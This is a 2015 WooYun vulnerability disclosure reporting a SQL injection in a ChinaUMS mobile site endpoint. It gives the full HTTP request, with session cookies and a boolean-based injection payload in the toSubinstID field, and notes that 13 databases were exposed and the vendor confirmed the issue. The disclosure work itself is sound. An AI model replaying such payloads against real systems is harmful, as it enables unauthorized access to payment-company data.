当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143470

漏洞标题:银联商务某站存在SQL注入(涉及13库)

相关厂商:银联商务

漏洞作者: 中央军

提交时间:2015-09-25 18:54

修复时间:2015-11-13 10:28

公开时间:2015-11-13 10:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-25: 细节已通知厂商并且等待厂商处理中
2015-09-29: 厂商已经确认,细节仅向厂商公开
2015-10-09: 细节向核心白帽子及相关领域专家公开
2015-10-19: 细节向普通白帽子公开
2015-10-29: 细节向实习白帽子公开
2015-11-13: 细节向公众公开

简要描述:

详细说明:

https://m.chinaums.com/

POST /geongf/qmf/newPosApply/save HTTP/1.1
Content-Type: application/json
Content-Length: 225
X-Requested-With: XMLHttpRequest
Referer: http://m.chinaums.com:80/
Cookie: JSESSIONID=www_80_2!!0000v0a8kLNFyVZF03vHus4hVN_:-1; GEONGF_SESSIONID=94PqV0yJwHhnZG218n0Qtm2qn9X1nVpgk6rJpmpsQzpJr3VQCk0P!-1218752366!1178501674; city=3965aecfa57ca36b; _ga=GA1.2.1857062971.1442067218; _gat=1; Hm_lvt_1c0d3d1413bff5b48a4a97f64a35f6a4=1442067221,1442067718; Hm_lpvt_1c0d3d1413bff5b48a4a97f64a35f6a4=1442067718; HMACCOUNT=B51BE74D997DCCE7; UISTELJSESSIONID=p1tfV0zN6y1TmHNtLG2DmZBB3rc01JYvFc2nYQh8p05QnDMJN5W7!1074120133!NONE; yuyanname=fan; BAIDUID=E3C8BA7C9C3C71E347481E0390F20273:FG=1; tc=AQAAAGfuVnXEPQwASlByfMNLOZu4gGCy
Host: m.chinaums.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
{"address":"e","business":"","content":"","email":"sample@email.tst","fax":"e","industry":"","linkman":"e","name":"e","phone":"e","subinstID":"","toSubinstID":"-1' OR 1=1* AND 000161=000161 -- "}

toSubinstID为注入点
为真:

1.png

为假:

2.png

涉及13个库

8.png

列了一些表:

9.png

数据就不敢收入了~

漏洞证明:

修复方案:

版权声明:转载请注明来源 中央军@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-09-29 10:26

厂商回复:

感谢白帽子提醒。

最新状态:

暂无